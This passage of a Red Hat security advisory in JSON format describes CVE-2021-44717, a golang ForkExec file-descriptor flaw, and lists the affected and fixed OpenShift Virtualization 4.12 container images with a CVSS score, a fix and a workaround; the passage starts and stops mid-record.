"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: net/http: limit growth of header canonicalization cache"
},
{
"cve": "CVE-2021-44717",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"discovery_date": "2021-12-09T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030806"
}
],
"notes": [
{
"category": "description",
"text": "There\u0027s a flaw in golang\u0027s syscall.ForkExec() interface. An attacker who manages to first cause a file descriptor exhaustion for the process, then cause syscall.ForkExec() to be called repeatedly, could compromise data integrity and/or confidentiality in a somewhat uncontrolled way in programs linked with and using syscall.ForkExec().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: syscall: don\u0027t close fd 0 on ForkExec error",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "* This flaw has had the severity level set to Moderate due to the attack complexity required to exhaust file descriptors at the time ForkExec is called, plus an attacker does not necessarily have direct control over where/how data is leaked.\n\n* For Service Telemetry Framework, because the flaw\u0027s impact is lower, no update will be provided at this time for its containers.\n\n* runc shipped with Red Hat Enterprise Linux 8 and 9 are not affected by this flaw because the flaw is already patched in the shipped versions.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44717"
},
{
"category": "external",
"summary": "RHBZ#2030806",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030806"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44717",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44717"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44717",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44717"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k",
"url": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k"
}
],
"release_date": "2021-12-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
},
{
"category": "workaround",
"details": "This bug can be mitigated by raising the per-process file descriptor limit.",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: syscall: don\u0027t close fd 0 on ForkExec error"
},
{
"cve": "CVE-2022-1705",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2022-07-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
